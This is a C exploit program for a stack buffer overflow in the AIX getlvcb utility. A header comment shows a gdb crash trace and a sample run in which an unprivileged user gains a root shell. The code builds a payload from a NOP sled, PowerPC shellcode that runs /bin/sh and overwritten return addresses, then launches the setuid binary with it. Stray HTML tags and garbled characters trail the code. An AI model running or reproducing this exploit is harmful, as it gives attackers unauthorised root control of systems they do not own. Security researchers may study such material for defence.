/******************************************************************** * Secure Network Operations (http://www.secnetops.com) * Local AIX getlvcb Exploit * by: mattox@secnetops.com * Program Description: * * Vulnerability Details: * * # gdb -q /usr/sbin/getlvcb * (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD * (gdb) r * Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD * * Program received signal SIGSEGV, Segmentation fault. * 0x41424344 in ?? () * (gdb) bt * #0 0x41424344 in ?? () * (gdb) i r * r0 0x6000328e 1610625678 * r1 0x2ff228a0 804399264 * r2 0xf012de88 -267198840 * r3 0x1 1 * r4 0x9 9 * r5 0x2ff22ff8 804401144 * r6 0xd030 53296 * r7 0x0 0 * r8 0x60000000 1610612736 * r9 0x600039ce 1610627534 * r10 0x0 0 * r11 0x6000214a 1610621258 * r12 0x41424344 1094861636 * r13 0x200008b0 536873136 * r14 0x0 0 * r15 0x0 0 * r16 0x0 0 * r17 0x0 0 * r18 0x0 0 * r19 0x0 0 * r20 0x0 0 * r21 0x0 0 * r22 0x0 0 * r23 0x0 0 * r24 0x0 0 * r25 0x0 0 * r26 0x0 0 * r27 0x0 0 * r28 0x41414141 1094795585 * r29 0x41414141 1094795585 * r30 0x41414141 1094795585 * r31 0x41414141 1094795585 * pc 0x41424344 1094861636 * ps 0x4000d030 1073795120 * cr 0x26222444 639771716 * lr 0x41424344 1094861636 * ctr 0x0 0 * xer 0x0 0 * fpscr 0x0 0 * vscr 0x0 0 * vrsave 0x0 0 * * ............................................................. * $ uname -a * AIX thunderfoot 1 5 002064864C00 * * $ whoami * kinet1k * * $ id * uid=7(kinet1k) gid=1(staff) groups=0(system) * $ ./r00tme 208 231 * * Secure Network Operations (written by: mattox@secnetops.com) * AIX Local getlvncb exploit * * Fixin to overwrite the address: 0x2ff2283d * Using a buffer size of: 208 * And an offset of: 231 * * # whoami * root * * # id * uid=0(root) gid=1(staff) groups=0(system) *.............................................................. * *********************************************************************/ #include #include #define OFFSET 0 #define BUFFERSIZE 208 #define NOP "\x7c\xa5\x2a\x79" #define RETURNADDR 0x2ff22924 char shellcode[ ] = "\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40" "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6" "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79" "\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40" "\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6" "\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04" "\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10" "\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh"; int main( int argc, char *argv[ ] ) { int i; int offset = OFFSET, bufferSize = BUFFERSIZE; unsigned long esp, returnAddress, *addressPointer; char *buffer, *pointer; /* Usage */ if( argv[ 1 ] ) { if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) { printf( "\n\tUsage: %s \n\n", argv[ 0 ] ); exit( 0 ); } } if( argc > 1 ) { bufferSize = atoi( argv[ 1 ] ); } if( argc > 2 ) { offset = atoi( argv[ 2 ] ); } returnAddress = RETURNADDR - offset; printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" ); printf( "AIX Local getlvncb exploit\n\n" ); printf( "Fixin to overwrite the address: 0x%x\n", returnAddress ); printf( "Using a buffer size of: %i\n", bufferSize ); printf( "And an offset of: %i\n", offset ); if( !( buffer = malloc( bufferSize ) ) ) { printf( "Coundn't allocate memory.\n" ); exit( 0 ); } /* I know, this is weird stuff...had to sub odd number to get ret addy to align */ pointer = buffer - 1; addressPointer = ( long * )pointer; for( i = 0; i < bufferSize; i+=4 ) { *( addressPointer++ ) = returnAddress; } for( i = 0; i < ( bufferSize / 2 ); i+=4 ) { buffer[ i ] = ( unsigned long )NOP; } pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) ); for( i = 0; i < strlen( shellcode ); i++ ) { *( pointer++ ) = shellcode[ i ]; } buffer[ bufferSize - 1 ] = '\0'; execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 ); free( buffer ); return 0; }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß